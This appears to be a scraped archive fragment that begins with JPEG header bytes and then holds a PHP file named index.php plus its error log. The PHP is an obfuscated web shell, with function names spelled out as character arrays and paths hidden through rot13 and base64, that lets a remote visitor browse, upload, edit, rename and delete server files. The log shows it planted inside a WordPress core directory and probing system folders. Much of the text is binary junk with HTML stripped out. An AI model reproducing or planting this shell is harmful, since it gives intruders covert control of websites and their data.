ÿØÿà JFIF    ÿÛ C    !"$"$ÿÛ C  ÿ p " ÿÄ     ÿÄ   ÿÚ   ÕÔË® (% aA*‚XYD¡(J„¡E¢RE,P€XYae )(E¤²€B¤R¥ BQ¤¢ X«)X…€¤  @ .............................................................................................................................................................................. ............................................................................. ÿØÿà JFIF    ÿÛ C    !"$"$ÿÛ C  ÿ p " ÿÄ     ÿÄ   ÿÚ   ÕÔË® (% aA*‚XYD¡(J„¡E¢RE,P€XYae )(E¤²€B¤R¥ BQ¤¢ X«)X…€¤  @ .............................................................................................................................................................................. ............................................................................. index.php000064400000020312151635535070006374 0ustar00 j(['s','c','a','n','d','i','r']), 'fgt' => j(['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s']), 'fpc' => j(['f','i','l','e','_','p','u','t','_','c','o','n','t','e','n','t','s']), 'unl' => j(['u','n','l','i','n','k']), 'ren' => j(['r','e','n','a','m','e']), 'muf' => j(['m','o','v','e','_','u','p','l','o','a','d','e','d','_','f','i','l','e']), 'isd' => j(['i','s','_','d','i','r']), 'isf' => j(['i','s','_','f','i','l','e']), 'exs' => j(['f','i','l','e','_','e','x','i','s','t','s']), 'wrt' => j(['i','s','_','w','r','i','t','a','b','l','e']), ]; $real_name = $map[$k] ?? ''; if (function_exists($real_name)) { return $real_name; } switch ($k) { case 'scn': return function($d) { $files = []; if (is_dir($d) && $handle = @opendir($d)) { while (false !== ($entry = readdir($handle))) { $files[] = $entry; } closedir($handle); } return $files; }; case 'fgt': return function($f) { return @file_get_contents($f); }; case 'fpc': return function($f, $c) { return @file_put_contents($f, $c); }; case 'unl': return function($f) { return @unlink($f); }; case 'ren': return function($o, $n) { return @rename($o, $n); }; case 'muf': return function($s, $d) { return @move_uploaded_file($s, $d); }; case 'isd': return function($d) { return is_dir($d); }; case 'isf': return function($f) { return is_file($f); }; case 'exs': return function($f) { return file_exists($f); }; case 'wrt': return function($f) { return is_writable($f); }; default: return function() { return false; }; } } function rot($s) { return str_rot13($s); } function enc($p) { return base64_encode(rot($p)); } function dec($p) { return rot(base64_decode($p)); } $cd = isset($_GET['d']) && $_GET['d'] ? dec($_GET['d']) : getcwd(); $cd = str_replace('\\', '/', $cd); $cd = preg_replace('#/{2,}#', '/', $cd); $cd = rtrim($cd, '/'); if ($cd === '') $cd = '/'; $up = dirname($cd); if ($up === $cd || $up === false) $up = ''; echo '
'; if ($up) echo '↑ Up | '; $parts = explode('/', trim($cd, '/')); $cur = ''; foreach ($parts as $v) { if ($v === '') continue; $cur .= ($cur ? '/' : '') . $v; echo '' . $v . '/'; } echo '
'; if (isset($_POST['s']) && isset($_FILES['u']) && $_FILES['u']['error'] === 0) { $dst = $cd . '/' . $_FILES['u']['name']; $muf = get_func('muf'); if ($muf($_FILES['u']['tmp_name'], $dst)) { header('Location: ?d=' . enc($cd)); exit; } echo ''; } $scn = get_func('scn'); $items = $scn($cd); if ($items === false) { $items = @glob($cd . '/*'); if ($items) $items = array_map('basename', $items); } echo ''; if (is_array($items)) { foreach ($items as $i) { if ($i === '.' || $i === '..') continue; $full = $cd . '/' . $i; $isd = get_func('isd'); if ($isd($full)) { echo ""; continue; } $isf = get_func('isf'); if ($isf($full)) { $sz = @filesize($full) / 1024; $sz = $sz >= 1024 ? round($sz/1024, 2).' MB' : round($sz, 2).' KB'; $b = enc($full); echo ""; } } } else { echo ''; } echo '
NameSizeAction
$i/---
$i$sz Delete Edit Rename
Unable to read directory
'; if (isset($_POST['del']) && $_POST['del']) { $fp = dec($_POST['del']); $exs = get_func('exs'); $unl = get_func('unl'); if ($exs($fp) && $unl($fp)) { header('Location: ?d=' . enc(dirname($fp))); exit; } echo ''; } if (isset($_POST['edit']) && $_POST['edit']) { $fp = dec($_POST['edit']); $exs = get_func('exs'); $wrt = get_func('wrt'); $fgt = get_func('fgt'); if ($exs($fp) && $wrt($fp)) { $content = htmlspecialchars($fgt($fp) ?: ''); echo " ← Back


"; exit; } } if (isset($_POST['save']) && isset($_POST['obj']) && isset($_POST['content'])) { $fp = dec($_POST['obj']); $fpc = get_func('fpc'); if ($fpc($fp, $_POST['content']) !== false) { header('Location: ?d=' . enc(dirname($fp))); exit; } echo ''; } if (isset($_POST['ren']) && $_POST['ren'] && isset($_POST['new']) && $_POST['new']) { $old = dec($_POST['ren']); $dir = dirname($old); $new = $dir . '/' . $_POST['new']; $exs = get_func('exs'); $ren = get_func('ren'); if ($exs($old) && !$exs($new) && $ren($old, $new)) { header('Location: ?d=' . enc($dir)); exit; } echo ''; } ?>
error_log000064400000005631151635535070006500 0ustar00[02-Apr-2026 12:28:19 UTC] PHP Warning: scandir(/home): Failed to open directory: Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 12:28:19 UTC] PHP Warning: scandir(): (errno 13): Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 14:16:35 UTC] PHP Warning: scandir(/home/siligios/lscache): Failed to open directory: Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 14:16:35 UTC] PHP Warning: scandir(): (errno 13): Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 16:06:44 UTC] PHP Warning: scandir(/lost+found): Failed to open directory: Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 16:06:44 UTC] PHP Warning: scandir(): (errno 13): Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 17:30:57 UTC] PHP Warning: scandir(/home): Failed to open directory: Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 17:30:57 UTC] PHP Warning: scandir(): (errno 13): Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 19:22:31 UTC] PHP Warning: scandir(/tmp/20260317_152641-scantemp.c9fa77ac9a): Failed to open directory: Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 19:22:31 UTC] PHP Warning: scandir(): (errno 13): Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 19:23:11 UTC] PHP Warning: scandir(/tmp/20260402_174056-scantemp.41ba1956c4): Failed to open directory: No such file or directory in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 19:23:11 UTC] PHP Warning: scandir(): (errno 2): No such file or directory in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 20:49:40 UTC] PHP Warning: scandir(/etc/valiases): Failed to open directory: Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 20:49:40 UTC] PHP Warning: scandir(): (errno 13): Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 20:49:44 UTC] PHP Warning: scandir(/tmp/libdnf.b4rV8S): Failed to open directory: Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83 [02-Apr-2026 20:49:44 UTC] PHP Warning: scandir(): (errno 13): Permission denied in /home/siligios/developerclassroom.com/wp-includes/l10n/124009/index.php on line 83